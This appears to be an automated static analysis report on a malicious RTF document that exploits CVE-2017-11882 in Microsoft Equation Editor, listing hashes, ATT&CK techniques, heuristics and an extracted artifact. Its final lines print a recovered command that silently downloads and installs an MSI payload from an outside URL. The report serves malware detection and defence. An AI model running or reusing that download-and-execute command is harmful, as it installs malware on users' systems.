Malicious RTF — malware analysis report

Static analysis result for SHA-256 9631c62fa2d40783…

MALICIOUS

RTF

10.6 KB Authoring application: Riched20 6.3.9600 First seen: 2019-05-31
MD5: f24d41c2ec8622b872cba3a8881f77c4 SHA-1: 039fa9994b7327b6618bec23e882d97dfe978673 SHA-256: 9631c62fa2d407833ec54cb449cb3f4f10f840dea12d4da7bb6df02b180a57b0
382 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The RTF file contains an embedded OLE object that exploits CVE-2017-11882 via Microsoft Equation Editor. This vulnerability allows for the execution of arbitrary code, likely to download and run a second-stage payload from the embedded URL http://www.tandf.xyz/cj/py.msi. The ClamAV signature further confirms the exploit nature of the file.

Heuristics 9

  • Equation Editor CLSID critical CVE likely RTF_EQUATION_EDITOR
    Equation Editor OLE CLSID found inside an OLE object — exploited by CVE-2017-11882 / CVE-2018-0802 / CVE-2018-0798
  • CVE-2017-11882 — Equation Editor FONT record overflow critical CVE likely CVE_2017_11882
    Equation Editor MTEF contains an overlong FONT typeface field, the vulnerable copy primitive for CVE-2017-11882. This is stronger evidence than the Equation Editor CLSID alone because it identifies the malformed record that drives code execution in EQNEDT32.EXE.
  • ClamAV: Rtf.Exploit.CVE_2017_11882-6584355-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Rtf.Exploit.CVE_2017_11882-6584355-1
  • Equation Editor object class critical RTF_OBJCLASS_EQUATION
    Object class 'equation.3' references Equation Editor
  • Suspicious extracted artifact critical EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • \objupdate forces OLE activation high RTF_OBJUPDATE
    RTF contains \objupdate — forces automatic OLE object instantiation when the document is opened, bypassing user interaction. Almost exclusively seen in Equation Editor exploit documents.
  • OLE object data medium RTF_OBJDATA
    RTF contains 1 \objdata section(s) — embedded OLE objects
  • Embedded OLE object medium RTF_OBJEMB
    RTF contains \objemb — embedded OLE object
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.tandf.xyz/cj/py.msi In RTF body

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
objdata_00_off00000362.bin rtf-objdata-decoded RTF \objdata at offset 0x362 3546 bytes
SHA-256: 43870b78310839337958c556ddba6ed9dcf1211ddbb0f5d70cb52d7ccbe40103
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered URL(s): http://www.tandf.xyz/cj/py.msi Static shellcode analysis recovered command string(s): cmd.exe /c msiexec /q /i "http://www.tandf.xyz/cj/py.msi"